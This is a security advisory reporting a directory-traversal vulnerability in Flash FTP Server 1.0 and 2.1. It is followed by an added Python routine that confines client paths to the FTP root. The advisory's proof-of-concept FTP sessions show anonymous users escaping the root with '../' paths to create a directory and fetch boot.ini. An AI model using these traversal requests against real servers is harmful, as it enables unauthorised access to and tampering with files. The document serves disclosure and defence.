Reported January 5, 2004 by dr_insane.
VERSIONS AFFECTED
· Flash FTP Server 1.0 and 2.1
DESCRIPTION
Flash FTP Server contains a directory-traversal vulnerability. By supplying
path arguments that contain "../" sequences (as shown in the demonstration
below), an attacker can read or modify files and directories that reside
anywhere on the vulnerable system.

VENDOR RESPONSE
NET2SOFT has been notified.

CREDIT
Discovered by dr_insane.

DEMONSTRATION
The discoverer posted the following demonstration as proof of concept:

Creation of a directory outside the bounding FTP root directory:
220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
pwd
257 "/C:/ftp_root/" is current directory.
mkd /../../../../../../../owned
257 'C:\..\..\..\..\..\..\..\owned': directory created.

Retrieving of a file outside the bounding FTP root directory:
220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
ftp> get /../../../../../../../../boot.ini
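As an added example (not code from the advisory or from Flash FTP Server), the root-confinement check whose absence the transcript shows: each client path is normalised on the FTP side and rejected as soon as a ".." would climb above the root, instead of being handed to the Windows file APIs. The root C:\ftp_root and the two client paths are taken from the transcript above; the function names and the benign third path are my own.

```python
from pathlib import PureWindowsPath

# FTP root as reported by the server's PWD reply in the advisory transcript.
FTP_ROOT = PureWindowsPath(r"C:\ftp_root")


class PathEscapesRoot(Exception):
    """Client path would resolve to a location outside FTP_ROOT."""


def confine_to_root(client_path: str, cwd: str = "/") -> PureWindowsPath:
    """Map an FTP-protocol path onto the filesystem, confined to FTP_ROOT.

    FTP paths are '/'-separated; the check walks the components of the virtual
    path and refuses any '..' that would pop past the root, rather than letting
    it reach the filesystem, where 'C:\\..\\..\\owned' is simply resolved
    relative to the drive root (as the MKD reply in the advisory shows).
    """
    # Backslash, drive colon and NUL have no place in an FTP path component,
    # but each changes meaning once the string reaches the Windows file APIs.
    if any(ch in client_path for ch in "\\:\x00"):
        raise PathEscapesRoot(client_path)
    virtual = client_path if client_path.startswith("/") else f"{cwd.rstrip('/')}/{client_path}"
    stack: list[str] = []
    for part in virtual.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not stack:  # nothing left to climb out of: the path escapes the root
                raise PathEscapesRoot(client_path)
            stack.pop()
        else:
            stack.append(part)
    return FTP_ROOT.joinpath(*stack)


def check_advisory_paths() -> dict[str, str]:
    """Resolve the two proof-of-concept paths from the advisory plus a benign one."""
    results = {}
    for path in ("/../../../../../../../owned",         # MKD argument from the transcript
                 "/../../../../../../../../boot.ini",   # RETR argument from the transcript
                 "/pub/../readme.txt"):                 # constructed: '..' stays inside root
        try:
            results[path] = str(confine_to_root(path))
        except PathEscapesRoot:
            results[path] = "REJECTED"
    return results


if __name__ == "__main__":
    for path, outcome in check_advisory_paths().items():
        print(f"{path!r:42} -> {outcome}")
```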
Directory Traversal Vulnerability in Flash FTP Server for Windows